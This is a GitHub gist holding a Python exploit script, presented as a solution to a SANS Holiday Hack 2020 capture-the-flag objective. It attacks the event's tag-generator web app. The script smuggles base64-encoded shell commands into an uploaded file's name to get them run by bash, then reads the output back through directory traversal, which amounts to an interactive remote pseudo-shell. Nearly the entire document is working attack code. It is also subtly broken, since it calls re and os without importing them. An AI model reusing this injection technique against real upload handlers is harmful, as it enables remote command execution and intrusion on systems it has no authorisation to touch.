Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
SANS Holiday Hack 2020 Broken Tag Generator Exploit - Solution for Objective 8
#!/usr/bin/env python3
import sys
import argparse
import string
import random
import requests
import urllib3
import base64
import readline
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Exploit command injection
def run_command(cmd):
url = 'https://tag-generator.kringlecastle.com/upload'
headers = {'User-Agent': useragent}
encoded_command = base64.b64encode(cmd.encode()).decode()
files = {'my_file[]': ("test.'; echo '{0}' | base64 -d | bash > {1}; png".format(encoded_command,random_filename), 'safe', 'image/png')}
try:
requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)
return
except Exception as e:
print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))
# Exploit directory traversal
def get_results():
url = 'https://tag-generator.kringlecastle.com/image?id={0}'.format(random_filename)
headers = {'User-Agent': useragent}
try:
r = requests.get(url,headers=headers,proxies=proxies,verify=False)
if r.status_code == requests.codes.ok:
return r.text
else:
return ''
except Exception as e:
print('[!] An exception occurred while trying to run the command on the target: {0}'.format(e))
# Primary function to call to execute a command
def execute_command(cmd):
run_command(cmd)
output = get_results()
run_command('echo \'\'')
return output
# Cleanup our temporary file we have been writing to, don't want to leave a mess
def clean_up():
url = 'https://tag-generator.kringlecastle.com/upload'
headers = {'User-Agent': useragent}
cmd = 'rm {0}'.format(random_filename)
files = {'my_file[]': ("test.'; {0}; png".format(cmd), 'safe', 'image/png')}
r = requests.post(url,headers=headers,files=files,proxies=proxies,verify=False)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Holiday Hack 2020 Tag Generator Pseudo Shell',
epilog = '''
Examples:
{0}
{0} -p http://127.0.0.1:8080
{0} -p http://127.0.0.1:8080 -u \'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \''''.format(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-p', '--proxy', help='Proxy example: http://127.0.0.1:8080', required=False, default=None, type=str, dest='proxy')
parser.add_argument('-u', '--useragent', help='User agent string to make requests with', required=False, default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', type=str, dest='useragent')
args = parser.parse_args()
# Global Variables
useragent = args.useragent
if args.proxy:
proxies = {'http': args.proxy, 'https': args.proxy}
else:
proxies = None
random_filename = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(32))
# Populate the prompt
username = execute_command("whoami").strip()
if len(username) == 0:
exit(1)
hostname = execute_command("hostname").strip()
path = execute_command("pwd").strip()
print("\n[*] Returning prompt!\n")
# Interact with pseudo shell
try:
while True:
prompt = username + "@" + hostname + ":" + path + "$ "
cmd = input(prompt)
if cmd == "exit":
print("\n[*] Goodbye!\n")
break
elif cmd.startswith("cd "):
chars = set(";&|")
if any((c in chars) for c in cmd):
print("[!] This shell only supports cd as a standalone command.")
else:
cmd = cmd.split()
tmpPath = " ".join(cmd[1:])
if tmpPath == "..":
if len(path.split("/")) > 2:
tmpPath = "/".join(path.split("/")[:-1])
else:
tmpPath = "/"
cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
tmpPath = execute_command(cmd).strip()
if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
path = tmpPath
else:
path = tmpPath.split('\n')[0]
elif cmd == "clear":
os.system("clear")
else:
cmd = "cd " + path + " && " + cmd
results = execute_command(cmd)
if len(results) != 0:
print(results)
clean_up()
except KeyboardInterrupt:
print("\n\n[*] Goodbye!\n")
clean_up()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment